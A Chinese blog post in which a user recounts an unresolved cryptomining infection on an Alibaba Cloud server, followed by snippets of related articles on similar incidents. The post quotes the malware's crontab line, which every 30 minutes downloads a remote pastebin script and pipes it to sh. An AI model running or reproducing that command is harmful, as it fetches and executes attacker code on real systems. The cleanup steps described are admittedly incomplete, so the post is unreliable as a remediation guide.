云服务器 被挖矿 未解决

最新推荐文章于 2024-06-24 16:24:24 发布
最新推荐文章于 2024-06-24 16:24:24 发布
阅读量823 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40567146/article/details/82377950
版权

连接阿里云服务器发现很卡,top 显示不出高占用进程,cpu100%占用。

crontab -l  发现有定时任务:

*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh

地址打开找不到源码,根据网上资料操作:
vim  /etc/ld.so.preload   删除其中内容 后执行ldconfig

再使用 top 可以看到 被隐藏的进程  kworkerds。

kill -9 pid 瞬间流畅。。

然后重启 cpu 继续100%  

然后根据第二个blog 删除文件 

开机病毒没了 一堆错误 redis无法启动 

重装吧。。。。

 

参考:http://www.cnblogs.com/xuey/p/9566094.html#undefined

           https://blog.csdn.net/hgx13467479678/article/details/82347473

黑石城主
关注
服务器被黑客攻击,用来挖矿,怎么办?
m0_63171455的博客
02-23 2689
昨天下午一个朋友和我说,他的服务器被阿里云监测出来在挖矿,然后阿里云官方把服务器给关停了。 不用急,这个时候最简单的方法是在阿里云里提一个工单,反馈相关问题。编程学习资料点击免费领取 解禁服务器 要解决问题、排查删除挖矿程序,首先我们需要解禁服务器,登录阿里云官方平台后,依次点击控制台->个人头像->安全管控进入相关页面。 在处罚列表,我们可以看到相关处罚记录,点击解除封禁后即可正常进入服务器了。 会有提示,需要在解禁后三日内找到挖...
服务器被黑客用来挖矿?怎么办?
JAVA88866的博客
05-14 2387
哈喽,大家好,我是老表~ 昨天下午一个朋友和我说,他的服务器被阿里云监测出来在挖矿,然后阿里云官方把服务器给关停了。 不用急,这个时候最简单的方法是在阿里云里提一个工单,反馈相关问题。 解禁服务器 要解决问题、排查删除挖矿程序,首先我们需要解禁服务器,登录阿里云官方平台后,依次点击控制台->个人头像->安全管控进入相关页面。 在处罚列表,我们可以看到相关处罚记录,点击解除封禁后即可正常进入服务器了。 会有提示,需要在解禁后三日内找到挖矿程序,并删除,否则官...
阿里云服务器挖矿minerd入侵的解决办法
weixin_30439067的博客
07-18 262
上周末,更新易云盘的时候,发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似,下边是他的解决办法 http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到始作俑者...
处理阿里云服务器中的恶意挖矿程序
最新发布
weixin_43268590的博客
06-24 716
恶意挖矿程序会在经用户许可的情况下在用户的设备上运行,占用大量计算资源进行挖矿,这可能会导致设备性能下降、温度升高、甚至硬件损伤。因此,用户应当做到以下措施来尽可能地预防挖矿: 及时更新系统和应用程序的安全补丁; 安装安全软件; 加强用户权限管理; 提升防火墙的安全级别,关闭不需要的服务端口; 监控服务器日志等。
阿里云服务器存在恶意挖矿程序
NicolasLearner的博客
04-27 892
阿里云发了很多短信。 进入服务器,发现速度缓慢。 输入 top命令查看cpu利用率,发现被占满。networkservice , sysupdate这两个程序。 netstat -anop 也能查询到很多 networkservice的程序用tcp在运行, 首先kill掉上述进程,但是没有卵用,还是很卡,top命令发现这些程序又启动了。 可以在 /proc/[PID]/目录下查看 exe文件,找到 进程对应的启动文件。 但是删掉这些文件还没有用,文件又被创建。 经上网查询.
如何利用云服务器挖矿_如何搭配使用最优最省的云服务器
weixin_39537680的博客
11-05 735
目前很多应用都已上云、大家如果开发一个平台,或者开发一个网站都需要相应的服务器。随着云技术的发展,越来越多的用户选择阿里云服务器、百度云服务器等。但是在使用过程中,很多用户都感觉费用每年还是比较高的,尤其是有一部分中小型企业用户。可能他们的数量是几台或者几十台服务器,也可能就一两台。但是每年都需要续费。 如何搭配使用最优最省的云服务器近期接到很多用户咨询希望能节省一些资源。今天就百度云服务器,注意...
记一次使用腾讯云服务器疑似被挖矿的经历及排查办法
The_real_undertaker的博客
05-30 556
当然,最后没有解决掉我的问题,因为我发现压根从mysql找不到那个线程,所以直接怀疑mysql进程有问题,应该是有狗子用mysql用户启动了一个进程,然后我以为是mysql服务器的进程,实际上是一个挖矿程序,好吧,破案了。综上,我发现在云服务器上,不管是勒索,还是挖矿,都跟mysql有关系,所以一定得做好安全防护,已知的就有,mysql数据库密码高强度;当时使用了top命令,发现高占用的程序时mysql,cpu应该是100,命令是一个奇怪的数字。最后,我把那个占用高的进程咔嚓了。通过top命令找到pid。
个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施
chinassj的博客
04-09 893
以前玩过腾讯,阿里,华为的免费服务器,都是又卡又慢,身为22世纪祖国的花朵,经过知识付费的熏陶,我义无反顾的终止了我的白嫖行为,然而努力让自己变得更好的路上总是有各种坑。。。。 服务器背景: 操作环境背景: 操作系统:Windows 10 操作工具:xshell(Free for Home/school) 故事背景: 拿到服务器后,创建了一个普通用户:shaun ;密码:12345...
centos6.8服务器中了挖矿程序病毒的解决方法
emtit2008的专栏
09-04 931
阿里云提示我的centos服务器出现紧急安全事件:挖矿程序;同时也出现服务器异常登录事件。 出现这样的情况,需要根据以下的步骤去处理 第一步:修改登录的帐号密码,输入命令passwd,根据提修改。 第二步:禁用可疑的IP,阿里云会有一些IP提示,先把异常登录的IP禁用;命令如下 iptables -I INPUT -s 68.183.140.39 -j DROP //禁用指定的IP ...
挖矿蠕虫肆虐,详解云防火墙如何轻松“制敌”
阿里云技术
05-09 840
根据阿里云安全团队发布的《2018年云上挖矿分析报告》显示,过去一年中,每一波热门0 Day的出现都伴随着挖矿蠕虫的爆发性传播,挖矿蠕虫可能因为占用系统资源导致业务中断,甚至还有部分挖矿蠕虫同时会捆绑勒索病毒(如XBash等)给企业带来资金与数据的损失。 如何提升企业的安全水位,抵御挖矿蠕虫的威胁成为每个企业都在思考的问题。本文以云上环境为例,从挖矿蠕虫的防御、检测和入侵后如何迅速止血三方面来阐...
阿里云服务器被通知存在“挖矿”行为,请及时整改
ywanju的博客
04-04 791
挖矿”行为是违f 的,一般如果不是自己操作的话,那就是被别人攻击了,利用漏洞在你的服务器上面安装了木马之类的东西。早晨被通知阿里云服务器存在挖矿行为,请及时整改,不然服务器被收回。
南京大学云主机常用命令
钟灵宛清
11-07 545
1.连接云主机 ssh root@云主机ip 2.从本地向云主机传输文件 scp 源路径 root@云主机ip:云主机路径 如:scp F:/a.txt root@172.19.240.106 3.云主机连接校园网 curl "http://p.nju.edu.cn/portal_io/login" --data "username=***&password=***" ...
云服务器挖矿病毒查杀日记
忆年--尘封的记忆
04-28 879
接手的某项目部署于某云平台centos服务器上,由tomcat作为中间件提供应用,且购买了该平台的域名服务,从2019年底上线运营,一直运行比较平稳,可能还没正式用起来,用的人也不是很多吧。但凡事总有个但是,近期发现云服务器CPU资源占用稳定在50%以上,且系统盘各目录被持续定入core.1234之类的陌生文件,导致磁盘空间占用超高。 紧接着操作服务器,不管执行什么命令,都会有这个错误提示: ERROR: ld.so: object '/usr/local/lib/libs.so' f.
排查腾讯云服务器挖矿病毒【pnscan】挟持
fanxindong0620的博客
09-27 6517
一、问题发现 最新在使用腾讯云部署项目应用,具体方式为docker部署,今天早上起床发现腾讯发来一条报警信息: 二、排查过程 使用last查看最近登录信息 使用history查看历史指令 查看/etc/passwd下的账户信息 查看日志文件/var/log/secure和/var/log/message 使用top查看进程运行信息 使用netstat查看端口信息 三、解决方案 ...
服务器处理挖矿
天地人的博客
10-31 1480
服务器处理挖矿排查挖矿进程 排查挖矿进程 使用top查询进程: 某个进程占用cpu或内存过分,查之:如 ls -l proc/{进程号}/exe 进入目录,分析里面的文件,进入/etc下,分析如update类似的文件。 处理过程: chattr -i 文件 rm -rf 文件 如果是root用户感染的病毒: vim /etc/selinux/config 将SELINUX=disabled改为...
云服务器挖矿病毒处理之二 --------bin/x7进程开机自启动
一杯咖啡的渗透记忆
11-08 887
云服务器挖矿病毒处理之一 --------kworker和netfs异常 上面之一是我遇到的第一个问题,当时以为解决了,但发现其中有三台机器只要启动后就会有bin/x7程序,很是顽固。 重启后就有问题,我查看了所有cron*的文件显示都正常的,然后再看了一下/etc/init.d里面的文件发现里面network文件的日期跟前面中毒的日期一样,打开了一搜发现有代码关于bin/x7而且shi后台执...
记录腾讯云服务器被植入pnscan挖矿病毒折磨的一天
weixin_61077098的博客
06-06 821
pnscan病毒非常狡猾,启动的进程号是动态的,导致不能轻易删除。还有文件删除后没多久又出现了多半是因为定时计划。虽然问题解决了,但并不知道服务器还有没有被修改的命令和一些恶意文件,如果不是很重要的服务器项目,建议备份数据重装服务器,并且不能轻易的把端口号防火墙放开,MySQL、redis等密码也要加大难度。2023年5月22日,建议大家直接重装系统,或者备份的镜像快照回滚。因为今天又出现30多次黑客的攻击,cpu直接100%,根本查不到恶意文件和进程号。所以直接重装!!!
(七)云服务器搭建集群遇到挖矿木马
Ares_song的博客
10-17 654
本笔记是个人参照林子雨老师教学文档进行撰写,详细请看厦门大学数据库实验室观看 个人搭建hadoop平台实用的环境:Ubuntu 14.04 64位 *3、JDK1.8、Hadoop 2.6.5 (apache) 一、Hadoop安装前准备 1、设置root用户 第一次需要设置root用户密码 root用户开机启动 在文件中添加下图红框内容: user-session=u...
云主机被挖矿解决方法
qq_38472451的博客
08-22 3223
云主机被挖矿解决方法
云服务器挖矿了需要重装系统吗
06-10
一般情况下,云服务器挖矿后最好的解决办法是重装系统。因为挖矿病毒通常会在系统中留下一些后门或者恶意程序,这些程序可能会继续在后台运行,重新感染服务器或者窃取敏感信息。所以,为了确保服务器安全,建议重...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值